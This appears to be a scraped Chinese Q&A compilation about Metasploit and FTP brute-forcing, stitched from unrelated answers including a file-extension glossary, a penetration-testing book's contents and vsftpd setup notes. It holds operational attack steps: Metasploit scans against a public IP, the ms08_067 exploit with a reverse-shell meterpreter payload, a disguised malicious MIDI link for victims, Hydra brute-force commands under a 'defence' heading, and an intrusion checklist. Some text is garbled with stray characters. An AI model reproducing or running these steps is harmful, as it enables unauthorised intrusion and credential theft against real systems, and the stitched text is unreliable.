msf爆破ftp服务

① 服务器所有文件都多了一个扩展名.GRANNY

文件后缀名大全
A:
1.ace:ace.exe或winace生成的压缩文件
2.ain:ain是一种压缩文件格式，解开ain需要用ain.exe。在网上可以找到。
可以在各大的ftppub/msdosutility之类地方寻找ain.exe
3.arj,a01,a02...:
arj是一种非常常见的压缩文件格式，它可以支持带目录，多文件压缩，
一般FTP中DOSutility目录下都可以找到arj.exe，一般的版本有2.4
2,2.382.50等，其文件格式是通用的，不存在格式不认问题。
a01,a02,a03是arj在多文件压缩时后面文件的缺省文件名。
展开arj文件可以用arjx-va-yfilename.arj
在windows下可以试试用winzip展开。
4.asp:
.asp文件通常指的是ActiveServerPages文件，这个文本文件可以
包括下列部分的任意组合：文本/HTML标记/ASP脚本命令,可以用
ie浏览器直接打开，也可以用记事本打开编辑。
.asp文件也可能是一种文档格式的文件，可以用cajviewer打开。
5.avi:
一般用windows自带的媒体播放器就可以播放。
如果没有图象只有声音，则可能是mpeg4格式，需要装插件。
如果有单独的字幕文件，则可以用其它播放器。
B:
1.BHX(BINHEX):
BinHex是苹果机器的一种编码方式.
WinZip可以解码.将email以文本方式存盘,扩展名为.BHX,
就可以直接用WinZip解压了.
2..bin
光盘映象文件，可以：
a.用Bin2ISO将bin转成ISO文件，然后用WinImage解开.
注意：有些BIN文件实际上就是ISO文件如果上面的办法有问题
可以直接将后缀改成iso,然后用WinImage解解看
b.用ISOBuster直接解BIN.
c.用daemon直接将BIN文件虚拟成光驱
C:
1.caj:cajviewer,CAJ文件浏览器是中国学术期刊（光盘版）电子杂志社（CAJEJPH）
的产品。它是为中国期刊网（www.chinajournal.net.cn)的全文检索，浏览开发的。
2.cdi:光盘映像文件，用DISKJuggle就可以打开
3.cdr:CorelDraw
4.cdp:NtiCdMaker做的光盘Image.用NtiCdMaker的FileCopy刻.
5.cfm:
www浏览器（服务器支持，类似asp,php,jsp）or文本编辑器看源码
6.chi:chm（htmlhelp)的索引，和chm文件一起使用
7.chm:
基于Html文件格式的帮助文档，在IE4.0以上可以双击直接打开。
制作工具可以采用HtmlHelpWorkShop。
8.cif:是easycdcreator地image文件
9.cpj:
WinONCD的工程文件，不过如果那个Raw文件是2072字节的扇区的话就是标准的ISO文件
换个扩展名，用什么刻录软件都可以，最差用WinImage直接展开安装也行。
10.cpx:cpx是一种压缩过的矢量图格式,CorelDraw
D:
1.dat：
一般指数据文件，比如某些音碟或者某些应用程序的数据。
是个很通用的扩展名（比如影碟，一般数据，......），无法判断用那个程序打开，
除非有更多信息，比如这些文件是做什么用的。
是某个软件附带的，还是独立存在的，等等。
2.dbf:
DOS下:
foxbase
foxpro
DN中F3(view)
Windows:
qview(快速查看)
FoxPro
Office中Excel等.
3.ddi:DISKDUPE,unimg,unddi,undisk
4.dvi:Latex处理过的文件,用任何一种Latex软件都可看它。
5.dxf:AutoCad,3DMax
6.dxr:
E:
1.ecw:有可能是ENSONIQAudioPCI声卡的波表样本
2.emf:扩展的wmf文件
3.eml:outlookexpress
4.eps:
eps是一种特殊的ps文件,通常是嵌入其他文档中使用.制作这种文件非常简单:
a)在Windows中安装一台PostScript打印机(并不是真的要买一台,仅仅是安装驱动
程序),例如HPLaserJet5P/5MPPostScript,设置其属性中的PostScript输出格式为
内嵌的PostScript,打印端口设为FILE(在磁盘上创建文件);
b)在任何绘图软件中编辑好图形后,在打印对话框中将打印机设为那个PostScript
打印机,然后打印到文件,文件名可取为xxx.eps,这将是你所需要的eps文件.
很多常用软件，比如ACDSee、Word等都可打开eps文件。
F:
1.fcd:用vitrulCD-ROM打开
2.fla:Flash
G:
1gerberfile(.dat.rep.pho文件):电路图可以送去制板的
2.gif:gif是一种很普遍的图像格式，用几乎所有的图像处理软件都可以处理gif。
3.gtp:guitarpro
.gtp是2.2以下版本的，3.0版本的是.gp3
H:
1.hlp:编辑可用helpmagic,helpscribe
2.hqx:
hqx格式就是所谓的Binhex4.0文件。
实际是Ascii文件。
在PC上可以用winzip6.2以上解开。
在Mac机上，如果你用Fetch2.0以上来传
(在随机的AppleInternetConnectKit上已带)
可以自动转成原来的Binary文件。
一般来说，你down了hqx格式的文件在PC上是派不上
什么用场的，当然你可以用来和别人交换word文件什么的。
I:
1.icl:IconLibrary,用AxIcons打开，一个专用的画图标的软件。
2.ic图标文件，可以用acdsee转成bmp文件。
3.idx:cterm非常下载下来的文件索引，用cterm自带的indexread打开
4.iges:iges是一个基于NURBS的文件格式,可以用AutoCad打开，如果不行，可以可以先拿到rhino中转成DXF
5.img:
img是软盘image文件，一个img就是一个软盘，尼需要一个工具将这样
的文件展开还原到软盘上，就是hd-，
6.is
一般是光盘镜像，直接用来刻盘或者用winimage解开
也可以装一个虚拟光盘软件daemon直接将之虚拟成光盘。
J:
1、.jpg，.jpeg：
.jpg是一种高压缩比的真彩图像文件格式，一般的图像处理软件都可以
显示jpg图像。推荐使用的看jpg程序有：在DOS下sea,在windows下用
acdsee,在UNIX下可以用xv来看jpg。
K:
1、.kc：
可以用king打开。
L:
1.lwp:LotusWordPro格式
2.lrc:一个winamp插件的歌词文件，可以在放mp3时显示歌词。以前叫lricsmate
3.lzh:
lzh是很老的一种压缩文件格式，近几年已经很少用了，展开lzh
文件需要lha.exe，在FTP的DOSutility目录下应该有。
好象以前有一种自解压然后运行的exe是用lha压的，lzh用winrar就能解
4.ldb
Access数据库锁定文件，纪录数据库的锁定信息，
比如是否被打开，是否以独占形式访问等等。
M:1.max:3DMax文件。
2.mdb:MicrosoftAccess数据库文件
3.mdl:Rose文件
4.mif:一种是MaxPlusII的文件
5.mov:电影文件，用Quicktime打开。
6.mpp:ProjectFile(MsProject)
7.msf:
part1：文件头，我见到的几个都是mstor打头的，文件头包括版本信息、注册表
的一些键值、图片的位置信息等等，关系不是很大，不必仔细研究。
part2:图片序列，图片都是jpeg格式的，每张图片的头可以通过查找"JFIF"字符串查到，查到后一定要后退六个字节，才是真正的jpeg文件头。也就是说
jpeg文件的第七到第十个字节是"JFIF"。每两张图片之间会有大量的字节
填充0,中间你会找到屏保运行时产生的临时文件的名字，如c:\\1.jpg;
由于jpg文件不校验字节和长度的，你可以随便取到临时文件名上面的哪个
0上。把之间的部分拷贝出来另存为.jpg文件就可以了，
part3：图片都取出来了，还管它干什么，呵呵
7.msi:
MSWindows的新的安装文件标准。已经在Office2000和Windows2000中采用。
98或NT下，可以装下面的软件：InstMsi9x.exe,InstMsiNT.exe
N:
1.nb:Mathematica的一种文件格式把。
2.nf
察看方法：
1.文本编辑器都可以看。建议将自动换行设为80列。
专门的查看软件：
NFOShow1.1是网友写的，实际效果是我见过最好的，不过有时时会出错退出。DAMN.NFO.Viewer.v2.0只有几十k，很好用，足够了。还可以在dos窗口下typexx.nfo
3.ngp,.ngc:
是模拟器游戏的文件neopocott0.35b(ngp模拟器)ngp模拟器neopocott升级到
了v0.35b版本，可在win9x,2k,me平台上运行。新版本暂停功能得到修改，支持
了ngc的扩展名文件，可以更好的存储和读取文件，增加了对键盘的设置等等
4.njx:南极星的字处理软件的文档格式
5.nrg:Nero做的CDImage,用nero直接打开刻盘即可
1.opx：Microsoft组织结构图，用office自带的组件可以打开，
默认不安装，需要添加程序。
P:
1.pdf:
pdf是adobe公司开发的一种类似于poscript的文件格式。可以用
adobe的acrobat,arcrbatreader来编辑，打开pdf文件
2.pdg:超星阅读器SSreader3.52以上版本
3.phtml:cajviewer
4.pl:一般说来是PERLScript,也可能是mp3播放软件的playlist文件
5.ppt.pps:PowerPoint
6、prn：
prn文件是打印机文件，比如你在Word中选择"打印到文件"就会生成这种文件。
你可以把扩展名改为ps，然后用GSView打开。
或者用PrFile这个软件直接把prn文件送到PS打印机打印出来。
7.ps:
ps的意思是PostScript，这是一种页面描述语言，主要用于高质量打印。
在UNIX和windows下都可以用GhostView来看ps文件。其homepage是
http://www.cs.wisc.e/~ghost/gsview/new23.html
如果你有PoscriptScript支持的打印机，可以直接打印PS文件。
如果你想制做PS文件，简单的办法是：在Windows下安装一个支持PostScript
的打印机驱动程序，比如HP4PS，你不需用非有这个打印机安装在你的机器上。安装好
驱动之后，在WIndows下任何一个编辑器中编辑好你需要转成PS的文件，比如从
Word下。然后选择"打印"，选择那个PS兼容的驱动程序，然后选择"printtofile"，
它将把打印输出送到一个文件中去。因为你用了一个Poscript的打印驱动程序，
那么这个打印文件就是PostScript文件了。将该文件改名字为XXX.ps就可以了。
8.ps.gz:
gzippedpostsript文件，可以用gsview直接打开，其支持gzip
如果是用IE下载的，有可能实际已经解开，可以去掉gz后缀试试。
9.psz:改成*.ps.gz试试,然后用gzip或者winzip解开就是.ps文件了
10.psf:outlinePostScriptprinterfont(ChiWriter)
11.ptl:AUTOCAD做出来的打印文件
Q:
R:
1、.rar，.r01，r02......:
rar是一种压缩文件格式，在DOS下解开RAR可以用rar.exe，在各大FTP
里面都可以找到，一般在pub/msdosutility之类地方。需要注意的是rar
高版本压缩的文件低版本不认。当前最新的rarforDOS是2.X版，如果
能找到2.x版的话最好不要用1.X板的rar，2版的rar文件相互是通用的。
rar的命令行参数几乎和arj一样，rarx-v-yfilename.rar
可以展开文件，包括带目录和多文件压缩。
rar多文件压缩时rar之后的文件名是r00,r01,r02....
DOS下的软件不支持长文件名，所以如果你的rar里面有长文件名并且因为
在DOS下展开丢失了得话，可以试试winrarforwin95，支持长文件名。
在各大ftp上应该也可以找到。其所有版本都可以认rar2.X得文件。
2、.raw：
是easycd或者winoncd等软件做的CDROM的ISO镜像
RAW属于MODE1的
3、.raw：
可用Photoshop看。
4、.rom：
是很小的音乐压缩格式，使用realplayer可以播放。
5、.rom：
是模拟器的文件吧。
6、.rpm：
RPM是RedhatPackageManager的简写。
是linux底下的软件包管理系统。
到Linux底下用使用rpm来对它进行操作。
7、.rm：
RM文件是一个包含了RA文件URL地址的文件，作用就同M3L与MP3一样，用于
REALPLAYER在INTERNET上播放RA流。
8、.rmx：
可以用realplayer打开。
9、.rtf：
richtextformat
包含格式的文本，可用于各种编辑器间交换文件，但是体积要比专用格式大很多。可以用word，写字板打开，一般的支持格式的编辑器都能打开。
S:
1、.sfe：filesplit分割文件。
用filesplit可以把他们合并成原来的zip文件。
或许还有自动合并得bat文件呢。
2、.sfv：
不是文件分割器产生的,是sfv32w产生的,一般用来做windows下的文件校验。
3、.shar：
ShellArchive,文本格式的打包文件，类似tar,不过tar生成的为binaryfile，在UNIX下sh<*.shar即可解包,或用专门的shar/unsharutilities。
4、.shg：
是microsoft的helpworkshop的图形处理工具生成的图形文件，
是用来在help中调用的。
5、.sit：
MacintoshStuffitarchives,
aswellasUUE(uuencoded),HQX(BinHex),bin(MacBinary),ZIP,ARC,
ARJ,andGZarchives
use"AladdinExpander"toexpand
6、.srm：
呵呵,当然是用Kiven电子书库了.你可以去化云坊down3.0.12的版本,也可以去http://kiven.yeah.netkiven的主页上当最新版.还有源码的呦.
7、.stx：
SyntaxfileofEditPlus
8、：
是Flash的动画格式，如果浏览器装了插件，可以用浏览器打开，但最好用
FlashPlayerBrowser打开。
9、.swp：
ScientificWordPlace
10、.spw
SigmaPlotWorksheet
http://www.spssscience.com/sigmaplot
T:
1、.tar.GZor.tar：
.tar.gz，或者.tgz的文件一般是在UNIX下用tar和gunzip压缩的文件。
可能的文件名还有.tar.GZ等。gunzip是一种比pkzip压缩比高的压缩程序，一般UNIX下都有。tar是一个多文件目录打包器，一般也是在unix下。
在UNIX下展开.tar.gz文件用tarzxvffilename.tar.gz就可以了或者用gunzip-dfilename.tar.gz得到filename.tar然后用tarxvffilename.tar解包，两步完成。
在PC环境下解tgz，可以用winzip6.2以上版本，可以直接打开extract。
建议在win95或者NT下使用winzip，因为很多这样的文件都是在UNIX下压缩的，
很可能有长文件名，但是WIndows3.1是不支持长文件名的，however,win31下的winzip也是应当可以展开tgz的。
2、.tar.Z：
.Z的文件一般是在UNIX下用compress命令压缩的。在UNIX下解开可以用uncompressfilename.Z。在PC下可以用winzip6.2以上版本，建议使用
win95版本的winzip，因为win31不支持长文件名，而UNIX下的文件很
可能是长文件名。但win31下winzip应该也可以解开。
如果是.tar.Z的文件的话可以用uncompress先解开外面一层，然后用
tarxvffilename.tar解开tar文件。在PC下还是用winzip。
3、.tex：
.tex本身是个文本文件，必须经过编译成dvi文件，使用winLatex就可以，如果你有unix当然会带TeX或LaTex的。
U:
1、.ufo：
问：这种文件要用什么程序打开？quickviewplus可以吗？
答1：使用photoimpact应该可以.
答2：通常是漫画,可以用冷雨浏览来看.
答3：找ufo2jpg.exe可以将ufo文件变成熟悉的JPG
2、.uu，.uue：
.uu是uucode的文件。uucode是一种把8bit文件转成7bit的算法。
我们知道，exe文件或者其他二进制文件是不可以直接用email
发出去的。uucode可以把这些文件转成7bit格式，就是普通文本文件格式
(如下面的样子)，然后就可以被接收方还原。
begin640pass
M("$Y-2V]R<5!1=UI!.C`Z,#I3=7!E`@<F]O=#IB>$Y-2V]R<5!1=UI!.C`Z,#I3=7!E<BU5<V5R.B\\Z+V)I;B]C
M<V@@<WES861M.BHZ,#HP.E-Y<W1E;2!6"B`@(&=U97-T.F-U-&I)=&M%9&HN
M:S(Z.3DX.CDY.#I\'=65S="!!8V-O=6YT.B]U<W(O<&5O<&QE+V=U97-T.B]B
如果你收到一个email是uucode做的，可以把它存成一个文件，将begin640..
之前的部分删除，然后改文件名为.uu，然后用uudecode解开。
在windows下可以用winzip6.2以上版本。
V:
1、.vcd：
一般是virtualdriver的虚拟光驱文件
也可以转换成iso，用daemon打开，参见格式转换，.vcd->.iso
另外金山影霸的文件也可能是vcd。
2、.vcf：
是地址本文件,用outlookexpress可以打开,(双击就可以)。
3、.vob：
DVD数据文件
4、.vos:
VOS是一款强大的电子琴模拟软件,.vos文件可以用它打开。
5、.vqf：
用Winamp播放，需要装相应的插件。
备注：VQF是YAMAHA公司和日本NTT公司联合开发的一种新音乐格式，它的压缩比比MP3更高，音质却与MP3不相上下，而它之所以没有MP3那般出尽风头，大概与其推出时间较迟以及缺和相应的广告宣传有关吧，加之其播放、制作工具目前还不是很丰富，所以知道的人不是很多。但不管怎么说，VQF的确是一种优秀的音乐压缩格式。常见播放工具有YamahaVQPlayer等等。
6、.vsd：
visio画的流程图
7、.vss：
visiotemplatefile
W:1、.wdl：
Dynadoc，华康文件阅读器可用dynadoc或FPread32.exe为关键字在ftp搜索引擎搜索。
2、.wmf：
WINDOWS的图元文件，用ACDSEE可以看，WORD也可以打开。
3、.wpd：
WPD是corel公司的wordperfect字处理软件的文档的扩展名。
4、.wsz：
winamp的skin，down下来以后是wsz格式ws打开一个winzip先，然后用winzip里的open。。。。。。。
X:
1、.xls：
MicroSoftExcel的文件。
2、.xml：
eXtensibleMarkupLanguage
SGML的一个子集,1998年2月正式发布1.0版
目前IE5.0可支持，可以在IE5.0下浏览.xml文件，但同时必须有相应的.xsl文件
才能正常显示。
Y:
......
Z:
1、.zip：
zip是一种最常见的压缩格式，在UNIX下解开zip用unzip命令。
在PC下解开zip可以用pkunzip.exe,一般在大ftp里面都可以找到，
或者用winzip解开。pkunzip-dfilename.zip可以带目录结构解开文件。

② 如何用Metasploit扫描端口

一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具：searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions

我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口，我们这里来扫描80：set PORTS 80
设置扫描目标RHOSTS ：set RHOSTS 119.63.37.149
在设置一下蔽猜线程：set THREADS 100
看一下我们设置好的

这时候我们都设置好了，我们来攻击下，看看效果，用命令run进行攻击
缺点就是扫描的速度有点慢啊

MetaSploit SMB扫描获取系统信息
还是搜索一下smb：searchsmb

这次发现搜出来很多，我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数

设定目标ip：set RHOSTS 192.168.188.140
在设置一下线程：set THREAD 10
然后run一下，查看结果

直接扫描出来小伙伴的系统还有主机名，速度不到1s，很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200

MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块：闹毁use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数，这里讲设置好的参数截图看一下

Run一下看看结果，其实没有扫出来，好像是屏蔽了，但是用nmap却扫出来了ssh

在试一下ftp，用这个模块：use auxiliary/scanner/ftp/ftp_version
设置下参数

可以看到结果，也没有扫描出来；
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置

这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum

设置好目标和线程后run一下就可以

MetaSploit远程代码执行
搜索一下08-067，使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置

我们只要设置一下目标就可以，然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数

将LHOST 设置为自己的ip（对外攻击不要忘了段口转发）
比如说知道对面的系统是什么版本，可以指定targer，用target查看一下都有什么版本

设置一下目标，假设我们目标机器的系统为10：set target 10
这时候，我们再来看一下其参数设置，发现比以前完备了好多

08-067是不会自宏弯型动识别系统版本的，但是其他的可以自动识别，所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter>
我们在里面输入shell，就会反弹一个shell
这样整个攻击过程就完成了

MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004

设置下本机ip set SRVHOST ip
然后攻击

会生成一个连接，但是这个链接容易让人发现，所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时，会发现报红，因为4444端口被占用了，所以我们改下监听端口 set LPORT 5555
然后生成连接

只要目标点了这个链接，那么我们就会上线一个shell
说一下，目标点击后我们这边并没有反映，我们需要输下session查看当前会话，会找到上线的机子，连接上线的机子
Session –I 1（id）
然后输入shell就可以拿到shell

③ metasploit怎样利用ftp入侵

第一部分扫描

④ 打开我的FTP的时候说 {用户指定的用户名密码无法登录到该FTP服务器}

这还能陵闷滑尺腊怎么办？
1.联系该FTP服务器管理员
和他要和GUEST帐号
2.爆罩伍破

⑤ Metasploit渗透测试指南的目录

《metasploit渗透测试指南》
第1章 渗透测试技术基础 1
1.1 ptes标准中的渗透测试阶段 2
1.1.1 前期交互阶段 2
1.1.2 情报搜集阶段 2
1.1.3 威胁建模阶段 2
1.1.4 漏洞分析阶段 3
1.1.5 渗透攻击阶段 3
1.1.6 后渗透攻击阶段 3
1.1.7 报告阶段 4
1.2 渗透测试类型 4
1.2.1 白盒测试 5
1.2.2 黑盒测试 5
1.3 漏洞扫描器 5
1.4 小结 6
第2章 metasploit基础 7
2.1 专业术语 7
2.1.1 渗拿闭透攻击（exploit） 8
2.1.2 攻击载荷（payload） 8
2.1.3 shellcode 8
.2.1.4 模块（mole） 8
2.1.5 监听器（listener） 8
2.2 metasploit用户接口 8
2.2.1 msf终端 9
2.2.2 msf命令行 9
2.2.3 armitage 11
2.3 metasploit功能程序 12
2.3.1 msf攻击载荷生成器 12
2.3.2 msf编码器 13
2.3.3 nasm shell 13
2.4 metasploit express和metasploit pro 14
2.5 小结 14
第3章 情报搜集 15
3.1 被动信息搜集 16
3.1.1 whois查询 16
3.1.2 netcraft 17
3.1.3 nslookup 18
3.2 主动信息搜集 18
3.2.1 使用nmap进行端口扫描 18
3.2.2 在metasploit中使用数据库 20
3.2.3 使用metasploit进行端口扫描 25
3.3 针对性扫描 26
3.3.1 服务器消息块协议扫描 26
3.3.2 搜寻配置不当的microsoft sql server 27
3.3.3 ssh服务器扫描 28
3.3.4 ftp扫描 29
3.3.5 简单网管协议扫罩升描 30
3.4 编写自己的扫描器 31
3.5 小结 33
第4章 漏洞扫描 35
4.1 基本的漏洞扫描 36
4.2 使用nexpose进行扫描 37
4.2.1 配置 37
4.2.2 将扫描报告导入到metasploit中 42
4.2.3 在msf控制台中运行nexpose 43
4.3 使用nessus进行扫描 44
4.3.1 配置nessus 44
4.3.2 创建nessus扫描策略 45
4.3.3 执行nessus扫描 47
4.3.4 nessus报告 47
4.3.5 将扫描结果导入metasploit框架中 48
4.3.6 在metasploit内部使用nessus进行扫描 49
4.4 专用漏洞扫描器 51
4.4.1 验证smb登录 51
4.4.2 扫描开放的vnc空口令 52
4.4.3 扫描开放的x11服务器 54
4.5 利用扫描结果进行自动化攻击 56
第5章 渗透攻击之旅 57
5.1 渗透攻击消闷裂基础 58
5.1.1 msf] show exploits 58
5.1.2 msf] show auxiliary 58
5.1.3 msf] show options 58
5.1.4 msf] show payloads 60
5.1.5 msf] show targets 62
5.1.6 info 63
5.1.7 set和unset 63
5.1.8 setg和unsetg 64
5.1.9 save 64
5.2 你的第一次渗透攻击 64
5.3 攻击一台ubuntu主机 68
5.4 全端口攻击载荷：暴力猜解目标开放的端口 71
5.5 资源文件 72
5.6 小结 73
第6章 meterpreter 75
6.1 攻陷windows xp 虚拟机 76
6.1.1 使用nmap扫描端口 76
6.1.2 攻击ms sql 76
6.1.3 暴力破解ms sql服务器 78
6.1.4 xp_cmdshell 79
6.1.5 meterpreter基本命令 80
6.1.6 获取键盘记录 81
6.2 挖掘用户名和密码 82
6.2.1 提取密码哈希值 82
6.2.2 使用meterpreter命令获取密码哈希值 83
6.3 传递哈希值 84
6.4 权限提升 85
6.5 令牌假冒 87
6.6 使用ps 87
6.7 通过跳板攻击其他机器 89
6.8 使用meterpreter脚本 92
6.8.1 迁移进程 92
6.8.2 关闭杀毒软件 93
6.8.3 获取系统密码哈希值 93
6.8.4 查看目标机上的所有流量 93
6.8.5 攫取系统信息 93
6.8.6 控制持久化 94
6.9 向后渗透攻击模块转变 95
6.10 将命令行shell升级为meterpreter 95
6.11 通过附加的railgun组件操作windows api 97
6.12 小结 97
第7章 免杀技术 99
7.1 使用msf攻击载荷生成器创建可独立运行的二进制文件 100
7.2 躲避杀毒软件的检测 101
7.2.1 使用msf编码器 102
7.2.2 多重编码 103
7.3 自定义可执行文件模板 105
7.4 隐秘地启动一个攻击载荷 106
7.5 加壳软件 107
7.6 小结：关于免杀处理的最后忠告 108
第8章 客户端渗透攻击 109
8.1 基于浏览器的渗透攻击 110
8.1.1 基于浏览器的渗透攻击原理 111
8.1.2 空指令 112
8.2 使用immunity调试器来揭秘空指令机器码 112
8.3 对ie浏览器的极光漏洞进行渗透利用 116
8.4 文件格式漏洞渗透攻击 119
8.5 发送攻击负载 120
8.6 小结 121
第9章 metasploit辅助模块 123
9.1 使用辅助模块 126
9.2 辅助模块剖析 128
9.3 小结 133
第10章 社会工程学工具包 135
10.1 配置set工具包 136
10.2 针对性钓鱼攻击向量 137
10.3 web攻击向量 142
10.3.1 java applet 142
10.3.2 客户端web攻击 146
10.3.3 用户名和密码获取 148
10.3.4 标签页劫持攻击 150
10.3.5 中间人攻击 150
10.3.6 网页劫持 151
10.3.7 综合多重攻击方法 153
10.4 传染性媒体生成器 157
10.5 teensy usb hid攻击向量 157
10.6 set的其他特性 160
10.7 小结 161
第11章 fast-track 163
11.1 microsoft sql注入 164
11.1.1 sql注入——查询语句攻击 165
11.1.2 sql注入——post参数攻击 166
11.1.3 手工注入 167
11.1.4 ms sql破解 168
11.1.5 通过sql自动获得控制（sqlpwnage） 172
11.2 二进制到十六进制转换器 174
11.3 大规模客户端攻击 175
11.4 小结：对自动化渗透的一点看法 176
第12章 karmetasploit无线攻击套件 177
12.1 配置 178
12.2 开始攻击 179
12.3 获取凭证 181
12.4 得到shell 182
12.5 小结 184
第13章 编写你自己的模块 185
13.1 在ms sql上进行命令执行 186
13.2 探索一个已存在的metasploit模块 187
13.3 编写一个新的模块 189
13.3.1 powershell 189
13.3.2 运行shell渗透攻击 190
13.3.3 编写powershell_upload_exec函数 192
13.3.4 从十六进制转换回二进制程序 192
13.3.5 计数器 194
13.3.6 运行渗透攻击模块 195
13.4 小结：代码重用的能量 196
第14章 创建你自己的渗透攻击模块 197
14.1 fuzz测试的艺术 198
14.2 控制结构化异常处理链 201
14.3 绕过seh限制 204
14.4 获取返回地址 206
14.5 坏字符和远程代码执行 210
14.6 小结 213
第15章 将渗透代码移植到metasploit框架 215
15.1 汇编语言基础 216
15.1.1 eip和esp寄存器 216
15.1.2 jmp指令集 216
15.1.3 空指令和空指令滑行区 216
15.2 移植一个缓冲区溢出攻击代码 216
15.2.1 裁剪一个已有的渗透攻击代码 218
15.2.2 构造渗透攻击过程 219
15.2.3 测试我们的基础渗透代码 220
15.2.4 实现框架中的特性 221
15.2.5 增加随机化 222
15.2.6 消除空指令滑行区 223
15.2.7 去除伪造的shellcode 223
15.2.8 我们完整的模块代码 224
15.3 seh覆盖渗透代码 226
15.4 小结 233
第16章 meterpreter脚本编程 235
16.1 meterpreter脚本编程基础 235
16.2 meterpreter api 241
16.2.1 打印输出 241
16.2.2 基本api调用 242
16.2.3 meterpreter mixins 242
16.3 编写meterpreter脚本的规则 244
16.4 创建自己的meterpreter脚本 244
16.5 小结 250
第17章 一次模拟的渗透测试过程 251
17.1 前期交互 252
17.2 情报搜集 252
17.3 威胁建模 253
17.4 渗透攻击 255
17.5 msf终端中的渗透攻击过程 255
17.6 后渗透攻击 257
17.6.1 扫描metasploitable靶机 258
17.6.2 识别存有漏洞的服务 259
17.7 攻击apache tomcat 260
17.8 攻击一个偏门的服务 262
17.9 隐藏你的踪迹 264
17.10 小结 266
附录a 配置目标机器 267
附录b 命令参考列表 275

⑥ 如何防范hydra ftp 暴力破解

使用hydra -h 查看基本用法。
使用命令 hydra - L userlist -P passwdlist -s port ftp://ip address
成功爆破出密码。
爆破telnet服务的命令为
hydra -L userlist -P passwdlist -s port telnet：//ipaddress
爆破ssh服务的命令为

hydra -L userlist -P passwdlist -s port ssh：//ipaddress

⑦ 从哪里弄FTP密码

找FTP服务器管理员，或者用字典“爆破”。

⑧ 网站渗透测试怎么做

1. 先看网站类型，安全性相对而已asp<aspx<php<jsp<cfm

2. 看服务器类型 windows还是 linux 还有 服务器应用，windows分iis6 iis7等等 linux分apache和nginx 需要知道对于版本的漏洞 如 iis6解析漏洞 你网络，web服务器解析漏洞大全

3. 反正需要懂的知识蛮多的 ，你自学没必要了，知识点 你可以网络下 知识点：

   网站入侵学习入门到高手所有重点难点视频推荐

当知识点学的差不多了，总体的方法差不多就是：

入侵网站，锁定目标 识别程序 找oday oday不成功 扫后门 扫备份 无后门 无备份 找后台 找注入 无注入 弱口令 无弱口令 找图片 扫编辑器 无编辑器 扫目录本地文件包含～任意文件下载 xss乱打拿不下 就旁注 旁不下 扫端口 还不行就去社 社不了 就爆破还不行 去C段 ip端口入侵 C段搞不了 子域名下手 还不行字典问题，

后面就是 学精sql注入（知道原理去尝试绕过waf），xss ，还有代码审计 内网域渗透，msf，反正学无止尽 这个知识主要靠累计，其他的靠自己本事去绕waf（ids和cdn），挖xss，oday获取突破点。

⑨ centos 7 vsftpd重启报错 vsftpd.service: control process exited, code=exited status=1

FTP 是File Transfer Protocol（文件传输协议）的英文简称，而中文简称为“文传协议”。

工作方式

主动模式：客户端从一个任意的非特权端口N（N>1024）连接到FTP服务器的命令端口，也就是21端口。然后客户端开始 监听端口N+1，并发送FTP命令“port N+1”到FTP服务器。接着服务器会从它自己的数据端口（20）连接到客户端指定的数据端口（N+1）。
被动模式：当开启一个 FTP连接时，客户端打开两个任意的非特权本地端口（N > 1024和N+1）。第一个端口连接服务器的21端口，但与主动方式的FTP不同，客户端不会提交PORT命令并允许服务器来回连它的数据端口，而是提交 PASV命令。这样做的结果是服务器会开启一个任意的非特权端口（P > 1024），并发送PORT P命令给客户端。然后客户端发起从本地端口N+1到服务器的端口P的连接用来传送数据。

先安装vsftpd

[root@localhost ~]# yum install vsftpd -y[root@localhost ~]# systemctl start vsftpd #启动vsftpd[root@localhost ~]# systemctl status vsftpd #查看vsftpd状态
vsftpd.service - Vsftpd ftp daemon
Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; disabled; vendor preset: disabled)
Active: active (running) since 五 2018-02-02 08:22:39 CST; 1min 50s ago
Process: 12558 ExecStart=/usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf (code=exited, status=0/SUCCESS)
Main PID: 12559 (vsftpd)
CGroup: /system.slice/vsftpd.service
└─12559 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf

vsftp三种认证模式

annoymous 匿名用户 #无虚输入密码即可访问
local user 真实用户 #服务器上存在的用户
guest user 虚拟用户 #映射到ftp服务器的用户

vsftpd的默认配置文件

[root@localhost ~]# vim /etc/vsftpd/vsftpd.conf
# Allow anonymous FTP? (Beware - allowed by default if you comment this out).anonymous_enable=YES #允许匿名用户登陆## Uncomment this to allow local users to log in.# When SELinux is enforcing check for SE bool ftp_home_dirlocal_enable=YES #允许本地用户登陆## Uncomment this to enable any form of FTP write command.write_enable=YES #允许本地用户读写## Default umask for local users is 077. You may wish to change this to 022,# if your users expect that (022 is used by most other ftpd's)local_umask=022 #本地用户创建文件的umask值......
dirmessage_enable=YES #当用户进入某个目录时，会显示该目录需要注意的内容是 messagexferlog_enable=YES #启动维护记录服务器上传和下载情况的日志文件connect_from_port_20=YES #FTP PORT主动模式进行数据传输时使用20端口xferlog_std_format=YES #传输日志文件将以标准 xferlog 的格式书写listen_ipv6=YES #监听ipv6pam_service_name=vsftpd #pam认证模块的名字userlist_enable=YES #拒绝登陆ftp的名单tcp_wrappers=YES #限制IP访问vsftpd

匿名用户认证

我们刚才已经开启了vsftpd 我们已经可以登陆ftp站点 #需关闭防火墙或设置规则 并关闭selinux

⑩ fern支持什么wifi芯片

